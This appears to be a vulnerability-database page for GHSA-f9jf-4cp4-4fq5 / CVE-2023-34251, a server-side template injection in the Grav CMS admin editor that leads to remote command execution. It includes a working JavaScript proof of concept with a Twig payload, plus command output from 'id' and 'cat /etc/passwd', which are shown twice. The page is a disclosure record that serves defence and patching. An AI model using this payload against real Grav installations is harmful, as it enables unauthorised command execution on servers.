github - ghsa-f9jf-4cp4-4fq5

ghsa-f9jf-4cp4-4fq5

Vulnerability from github

Published

2023-06-16 19:35

Modified

2023-06-16 19:35

Severity ?

9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

Grav Server Side Template Injection (SSTI) vulnerability

Details

Summary

I found an RCE(Remote Code Execution) by SSTI in the admin screen.

Details

Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.

PoC

Log in to the administrator screen and access the edit screen of the default page "Typography". (http://127.0.0.1:8000/admin/pages/typography)
Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (id) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=unique_form_id]").value;

const payload = "{{['id']|map('system')|join}}"; // SSTI Payload

const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", ""); params.append("data[name]", "default"); params.append("data[header][body_classes]", ""); params.append("data[ordering]", 1); params.append("data[order]", ""); params.append("toggleable_data[header][process]", "on"); params.append("data[header][process][twig]", 1); params.append("data[header][order_by]", ""); params.append("data[header][order_manual]", ""); params.append("data[blueprint", ""); params.append("data[lang]", ""); params.append("_post_entries_save", "edit"); params.append("form-name", "flex-pages"); params.append("unique_form_id", id); params.append("admin-nonce", nonce);

await fetch("http://127.0.0.1:8000/admin/pages/typography", { method: "POST", headers: { "content-type": "application/x-www-form-urlencoded", }, body: params, });

window.open("http://127.0.0.1:8000/admin/pages/poc/:preview"); })(); ```

Execution Result

Payload: {{['id']|map('system')|join}} sh uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
Payload: {{['cat /etc/passwd']|map('system')|join}} ```sh

# User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody::-2:-2:Unprivileged User:/var/empty:/usr/bin/false root::0:0:System Administrator:/var/root:/bin/sh daemon::1:1:System Services:/var/root:/usr/bin/false _uucp::4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated::13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd::24:24:Network Services:/var/networkd:/usr/bin/false _installassistant::25:25:Install Assistant:/var/empty:/usr/bin/false _lp::26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix::27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd::31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces::32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore::33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr::54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents::55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod::56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs::59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox::60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder::65:65:mDNSResponder:/var/empty:/usr/bin/false _ard::67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www::70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc::71:71:Apple Events User:/var/empty:/usr/bin/false _cvs::72:72:CVS Server:/var/empty:/usr/bin/false _svn::73:73:SVN Server:/var/empty:/usr/bin/false _mysql::74:74:MySQL Server:/var/empty:/usr/bin/false _sshd::75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss::76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus::77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman::78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver::79:79:Application Server:/var/empty:/usr/bin/false _clamav::82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd::83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber::84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner::87:87:Application Owner:/var/empty:/usr/bin/false _windowserver::88:88:WindowServer:/var/empty:/usr/bin/false _spotlight::89:89:Spotlight:/var/empty:/usr/bin/false _tokend::91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent::92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar::93:93:Calendar:/var/empty:/usr/bin/false _teamsserver::94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing::95:-2:Update Sharing:/var/empty:/usr/bin/false _installer::96:-2:Installer:/var/empty:/usr/bin/false _atsserver::97:97:ATS Server:/var/empty:/usr/bin/false _ftp::98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown::99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate::200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod::202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver::203:203:Screensaver:/var/empty:/usr/bin/false _locationd::205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent::208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone::210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda::211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot::212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd::213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot::214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio::215:215:DP Audio:/var/empty:/usr/bin/false _postgres::216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt::217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin::218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw::219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr::220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver::221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios::222:222:NetBIOS:/var/empty:/usr/bin/false _warmd::224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull::227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics::228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced::229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt::230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin::231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw::232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos::233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous::234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache::235:235:Asset Cache Service:/var/empty:/usr/bin/false _coremediaiod::236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd::239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices::240:240:IconServices:/var/empty:/usr/bin/false _distnote::241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond::242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd::244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris::245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast::246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd::247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser::248:248:Setup User:/var/setup:/bin/bash _ondemand::249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs::251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy::252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset::253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice::254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors::257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent::258:258:captiveagent:/var/empty:/usr/bin/false _ctkd::259:259:ctkd Account:/var/empty:/usr/bin/false _applepay::260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd::261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants::262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd::263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd::265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed::266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd::268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception::269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit::270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod::271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd::272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld::273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd::274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod::275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd::277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater::278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd::279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml::280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd::281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd::282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced::283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon::284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy::285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge::288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome::289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets::291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd::441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd::441:441:OAH Daemon:/var/empty:/usr/bin/false

```

PoC Video

PoC Video

Impact

Remote Command Execution (RCE) is possible.

Occurrences

https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174

References

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.42"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-34251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-16T19:35:56Z",
    "nvd_published_at": "2023-06-14T22:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nI found an RCE(Remote Code Execution) by SSTI in the admin screen.\n\n### Details\nRemote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.\n\n### PoC\n1. Log in to the administrator screen and access the edit screen of the default page \"Typography\". (`http://127.0.0.1:8000/admin/pages/typography`)\n2. Open the browser\u0027s console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.\n```js\n(async () =\u003e {\n  const nonce = document.querySelector(\"input[name=admin-nonce]\").value;\n  const id = document.querySelector(\"input[name=__unique_form_id__]\").value;\n\n  const payload = \"{{[\u0027id\u0027]|map(\u0027system\u0027)|join}}\"; // SSTI Payload\n\n  const params = new URLSearchParams();\n  params.append(\"task\", \"save\");\n  params.append(\"data[header][title]\", \"poc\");\n  params.append(\"data[content]\", payload);\n  params.append(\"data[folder]\", \"poc\");\n  params.append(\"data[route]\", \"\");\n  params.append(\"data[name]\", \"default\");\n  params.append(\"data[header][body_classes]\", \"\");\n  params.append(\"data[ordering]\", 1);\n  params.append(\"data[order]\", \"\");\n  params.append(\"toggleable_data[header][process]\", \"on\");\n  params.append(\"data[header][process][twig]\", 1);\n  params.append(\"data[header][order_by]\", \"\");\n  params.append(\"data[header][order_manual]\", \"\");\n  params.append(\"data[blueprint\", \"\");\n  params.append(\"data[lang]\", \"\");\n  params.append(\"_post_entries_save\", \"edit\");\n  params.append(\"__form-name__\", \"flex-pages\");\n  params.append(\"__unique_form_id__\", id);\n  params.append(\"admin-nonce\", nonce);\n\n  await fetch(\"http://127.0.0.1:8000/admin/pages/typography\", {\n    method: \"POST\",\n    headers: {\n      \"content-type\": \"application/x-www-form-urlencoded\",\n    },\n    body: params,\n  });\n\n  window.open(\"http://127.0.0.1:8000/admin/pages/poc/:preview\");\n})();\n```\n\n#### Execution Result\n- Payload: `{{[\u0027id\u0027]|map(\u0027system\u0027)|join}}`\n```sh\nuid=501(\u003cuser_name\u003e) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(\u003cuser_name\u003e) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)\n```\n- Payload: `{{[\u0027cat /etc/passwd\u0027]|map(\u0027system\u0027)|join}}`\n```sh\n## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd:*:31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces:*:32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore:*:33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents:*:55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod:*:56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate:*:200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod:*:202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver:*:203:203:Screensaver:/var/empty:/usr/bin/false _locationd:*:205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent:*:208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone:*:210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda:*:211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot:*:214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio:*:215:215:DP Audio:/var/empty:/usr/bin/false _postgres:*:216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt:*:217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin:*:218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw:*:219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr:*:220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver:*:221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios:*:222:222:NetBIOS:/var/empty:/usr/bin/false _warmd:*:224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull:*:227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics:*:228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced:*:229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt:*:230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin:*:231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw:*:232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos:*:233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous:*:234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache:*:235:235:Asset Cache Service:/var/empty:/usr/bin/false _coremediaiod:*:236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd:*:239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices:*:240:240:IconServices:/var/empty:/usr/bin/false _distnote:*:241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond:*:242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd:*:244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast:*:246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd:*:247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser:*:248:248:Setup User:/var/setup:/bin/bash _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs:*:251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy:*:252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset:*:253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _ctkd:*:259:259:ctkd Account:/var/empty:/usr/bin/false _applepay:*:260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd:*:261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants:*:262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd:*:265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd:*:268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld:*:273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd:*:274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod:*:275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge:*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome:*:289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets:*:291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false\n```\n\n#### PoC Video\n- [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing)\n\n### Impact\nRemote Command Execution (RCE) is possible.\n\n### Occurrences\n- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\n\n### References\n- [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)\n- [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php)\n",
  "id": "GHSA-f9jf-4cp4-4fq5",
  "modified": "2023-06-16T19:35:56Z",
  "published": "2023-06-16T19:35:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34251"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav Server Side Template Injection (SSTI) vulnerability"
}

CVE-2023-34251 (GCVE-0-2023-34251)

Vulnerability from cvelistv5

Published

2023-06-14 21:31

Modified

2024-12-27 16:52

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Summary

Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.

References

►

URL

	Vendor	Product	Version
	getgrav	grav	Version: < 1.7.42

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

ghsa-f9jf-4cp4-4fq5

Vulnerability from github

Summary

Details

PoC

Execution Result

PoC Video

Impact

Occurrences

References

CVE-2023-34251 (GCVE-0-2023-34251)

Vulnerability from cvelistv5

Tags

Sightings

Nomenclature